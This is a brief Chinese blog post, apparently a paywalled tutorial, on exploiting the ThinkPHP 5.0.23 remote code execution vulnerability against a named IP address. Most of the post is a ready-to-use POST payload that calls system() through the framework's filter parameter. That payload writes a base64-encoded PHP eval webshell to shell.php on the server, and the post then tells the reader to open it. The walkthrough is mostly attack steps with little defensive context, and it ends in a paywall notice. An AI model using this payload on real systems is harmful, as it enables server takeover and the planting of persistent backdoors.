ThinkPHP5 5.0.23远程代码执行漏洞

http://159.75.16.25:8089/index.php?s=captcha会出现如下报错

F12进入开发者 用HackBar 插件发送 POST 请求

得到回显:

通过echo命令写入 Webshell 文件
首先将一句话木马进行 Base64 编码

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2FhYSddKSA/PmJi | base64 -d > shell.php
访问shell.Php

本文详细介绍了ThinkPHP5版本5.0.23和5.0.22/5.1.29存在的远程代码执行漏洞。通过发送特定的POST请求,可以触发系统命令执行,例如写入Webshell文件。利用方法包括编码木马并解码,以及调用系统函数获取系统信息。
最低0.47元/天 解锁文章
5736

被折叠的 条评论
为什么被折叠?



